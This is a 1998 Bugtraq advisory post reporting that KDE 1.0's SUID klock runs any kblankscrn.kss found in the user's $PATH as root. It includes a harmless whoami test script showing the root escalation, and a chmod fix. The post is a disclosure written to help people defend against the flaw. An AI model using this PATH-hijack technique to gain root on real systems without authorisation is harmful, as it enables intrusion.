Bugtraq mailing list archives
KDE 1.0's klock can be used to gain root priveledges
From: hdmoore () USA NET (HD Moore)
Date: Mon, 16 Nov 1998 19:57:51 -0600
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - --( the problem )-- The SUID program klock shipped with KDE 1.0 attempts to execute kblankscrn.kss in the same directory as it. If kblankscrn.kss cannot be executed (missing or mode -x) then klock will search the current user's $PATH for any executable with the same name and execute it as ROOT. If no executable is found in the current path it gives this message: >Could not invoke kblankscrn.kss in $PATH or /opt/kde/bin Default modes for klock and kblankscrn.kss are: - -rwsr-xr-x 1 root root 8760 Mar 12 1998 /opt/kde/bin/klock - -rwsr-xr-x 1 root root 43600 Mar 12 1998 /opt/kde/bin/kblankscrn.kss Systems Affected: any system that runs KDE 1.0 ____________________________________________________ ( the exploit ) This is only exploitable if any of the following occurs: 1) klock is moved to another directory 2) kblankscrn.kss is moved to another directory 3) kblankscrn.kss is not executable To see if you are vulnerable... 1) as root, chmod 600 /opt/kde/bin/kblankscrn.kss 2) login as a normal user 3) create a shell script thats looks like: #!/bin/sh echo Running script as `whoami`! exit 4) name this script to kblankscrn.kss and mv to your home directory. 5) execute /opt/kde/bin/klock, you should see: user@hostname:/home/user> /opt/kde/bin/klock user@hostname:/home/user> Running script as root! 6) as root, chmod 755 /opt/kde/bin/kblankscrn.kss ____________________________________________________ - --( the fix )-- chmod 700 /opt/kde/bin/klock or wait until KDE is updated. the KDE buglist has been notified -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQA/AwUBNlDXoa51X44hunVSEQJl2wCgzFbX8KdOfCfOMZGREF5e9H2BGA8An3Qw UmLBRO0nACQcXreodKkWFrpm =rKnX -----END PGP SIGNATURE-----
Current thread:
- Re: ISS Security Advisory: Hidden community string in SNMP, (continued)
- Re: ISS Security Advisory: Hidden community string in SNMP Davin Milun (Nov 05)
- Re: ISS Security Advisory: Hidden community string in SNMP Raphael Muzzio (Nov 15)
- Re: ISS Security Advisory: Hidden community string in SNMP sugarat (Nov 15)
- Re: ISS Security Advisory: Hidden community string in SNMP Matt M. Morris (Nov 16)
- Re: ISS Security Advisory: Hidden community string in SNMP sugarat (Nov 16)
- Re: ISS Security Advisory: Hidden community string in SNMP Matt M. Morris (Nov 17)
- nftp vulnerability (fwd) Eric Wanner (Nov 16)
- ISSalert: ISS Security Update Aleph One (Nov 16)
- Re: ISS Security Advisory: Hidden community string in SNMP sugarat (Nov 15)
- Re: ISS Security Advisory: Hidden community string in SNMP Matt M. Morris (Nov 16)
- Security Bulletins Digest (fwd) Piotr Strzy¿ewski (Nov 16)
- KDE 1.0's klock can be used to gain root priveledges HD Moore (Nov 16)
- Re: KDE 1.0's klock can be used to gain root priveledges Phillip Vandry (Nov 17)